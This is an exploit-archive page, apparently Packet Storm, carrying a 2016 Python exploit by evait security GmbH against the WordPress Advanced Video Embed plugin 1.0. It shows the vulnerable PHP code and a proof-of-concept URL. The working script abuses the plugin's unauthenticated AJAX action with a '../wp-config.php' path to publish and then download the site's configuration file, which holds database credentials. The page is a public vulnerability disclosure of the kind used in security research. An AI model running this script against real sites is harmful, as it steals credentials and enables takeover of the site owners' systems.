WordPress Advanced Video 1.0 Local File Inclusion

WordPress Advanced Video 1.0 Local File Inclusion: Posted Apr 1, 2016; Authored by evait security GmbH; WordPress Advanced Video plugin version 1.0 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 0a2a85eaf425897047bc6e470ff6ccf601d448988df81558e127ea4c9c6a5eb2; Download | Favorite | View

WordPress Advanced Video 1.0 Local File Inclusion

#!/usr/bin/env python
 
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
 
#   Timeline
#   03/24/2016 - Bug discovered
#   03/24/2016 - Initial notification of vendor
#   04/01/2016 - No answer from vendor, public release of bug 
 
 
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
 
#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);
 
 
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
 
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
 
import random
import urllib2
import re
 
url = "http://127.0.0.1/wordpress" # insert url to wordpress
 
randomID = long(random.random() * 100000000000000000L)
 
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    id = int(id) / 10
 
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
 
for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 93 files
Gentoo 31 files
Debian 21 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Amit Roy 4 files
Aslam Anwar Mahimkar 3 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,075)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,322)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,252)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,647)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

WordPress Advanced Video 1.0 Local File Inclusion

WordPress Advanced Video 1.0 Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Advanced Video 1.0 Local File Inclusion

Share This

WordPress Advanced Video 1.0 Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems